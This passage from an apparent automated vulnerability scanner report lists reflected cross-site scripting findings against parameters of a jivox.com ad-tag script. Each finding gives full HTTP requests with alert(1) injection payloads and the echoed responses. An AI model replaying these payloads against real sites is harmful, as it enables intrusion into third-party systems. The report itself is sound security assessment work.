User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:41 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57970
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...

var s = document.createElement('script');
s.type='text/javascript';
s.src= serverURL + '/jivox/serverAPIs/controlSettings.php?action=read&callback=jvxAdPlayera375c';alert(1)//e99e5f54d4b.returnControlSettingsCookie&name='+name+'&r='+jvxRandomNumber+'&t='+jvxTimeStamp.getTime();
document.getElementsByTagName('head')[0].appendChild(s);
},


...[SNIP]...

4.80. http://as.jivox.com/player/jivox_ad_tags.php [objectName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the objectName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96810"%3balert(1)//cac32923e7e was submitted in the objectName parameter. This input was echoed as 96810";alert(1)//cac32923e7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer96810"%3balert(1)//cac32923e7e&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:38 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57970
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...

render : generateJivoxPlayerTags

}
};

if(typeof(jivoxAdPlayer) != "undefined"){
var jvxAdPlayer96810";alert(1)//cac32923e7e = new jivoxAdPlayer();
jvxAdPlayer96810";alert(1)//cac32923e7e.setPlayerWidth(300);
jvxAdPlayer96810";alert(1)//cac32923e7e.setPlayerHeight(250);
jvxAdPlayer96810";alert(1)//cac32923e7e.setServerURL("http://as.jivox.com");
jvxAdPlayer96810";alert(
...[SNIP]...

4.81. http://as.jivox.com/player/jivox_ad_tags.php [objectName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the objectName request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 54bce%3balert(1)//6751049e87a was submitted in the objectName parameter. This input was echoed as 54bce;alert(1)//6751049e87a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer54bce%3balert(1)//6751049e87a&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:46 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57958
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
tivity,

retractOpenPanel : retractOpenPanel,


render : generateJivoxPlayerTags

}
};

if(typeof(jivoxAdPlayer) != "undefined"){
var jvxAdPlayer54bce;alert(1)//6751049e87a = new jivoxAdPlayer();
jvxAdPlayer54bce;alert(1)//6751049e87a.setPlayerWidth(300);
jvxAdPlayer54bce;alert(1)//6751049e87a.setPlayerHeight(250);
jvxAdPlayer54bce;alert(1)//6751049e87a.setSe
...[SNIP]...

4.82. http://as.jivox.com/player/jivox_ad_tags.php [pauseBetweenAds parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the pauseBetweenAds request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e16d"-alert(1)-"53b11bd0f73 was submitted in the pauseBetweenAds parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=10008e16d"-alert(1)-"53b11bd0f73&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:29 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
DEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=10008e16d"-alert(1)-"53b11bd0f73&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/1
...[SNIP]...

4.83. http://as.jivox.com/player/jivox_ad_tags.php [r parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 997ac"-alert(1)-"8b668abcb76 was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028997ac"-alert(1)-"8b668abcb76&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:34 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
jvxAdPlayer.setPlayerWidth(300);
jvxAdPlayer.setPlayerHeight(250);
jvxAdPlayer.setServerURL("http://as.jivox.com");
jvxAdPlayer.setFlashVariables("t=1307962892856&r=0.9127810774371028997ac"-alert(1)-"8b668abcb76&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcSh
...[SNIP]...

4.84. http://as.jivox.com/player/jivox_ad_tags.php [reportingURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the reportingURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 235f6"-alert(1)-"1155aa007e6 was submitted in the reportingURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com235f6"-alert(1)-"1155aa007e6&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:54 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
ion=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com235f6"-alert(1)-"1155aa007e6&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=&jvxSessionId=1307963034.6078");
jvxAdPlayer.setPlayerObjectId("jvxAdPlayer");
jvxAdP
...[SNIP]...

4.85. http://as.jivox.com/player/jivox_ad_tags.php [restartOnUnmute parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the restartOnUnmute request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40ae9"-alert(1)-"bfa34e952f0 was submitted in the restartOnUnmute parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=140ae9"-alert(1)-"bfa34e952f0&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:41 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=140ae9"-alert(1)-"bfa34e952f0&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=&jvx
...[SNIP]...

4.86. http://as.jivox.com/player/jivox_ad_tags.php [serverName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the serverName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4197e"%3balert(1)//3bc496d4453 was submitted in the serverName parameter. This input was echoed as 4197e";alert(1)//3bc496d4453 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com4197e"%3balert(1)//3bc496d4453&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:52 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57690
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
f(jivoxAdPlayer) != "undefined"){
var jvxAdPlayer = new jivoxAdPlayer();
jvxAdPlayer.setPlayerWidth(300);
jvxAdPlayer.setPlayerHeight(250);
jvxAdPlayer.setServerURL("http://as.jivox.com4197e";alert(1)//3bc496d4453");
jvxAdPlayer.setFlashVariables("t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com4197e"%3balert(1)//3bc496d4453&iframeTag=on&siteId=24bbcd13d37379&ca
...[SNIP]...

4.87. http://as.jivox.com/player/jivox_ad_tags.php [serverURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the serverURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91e52"-alert(1)-"5fe4b721423 was submitted in the serverURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

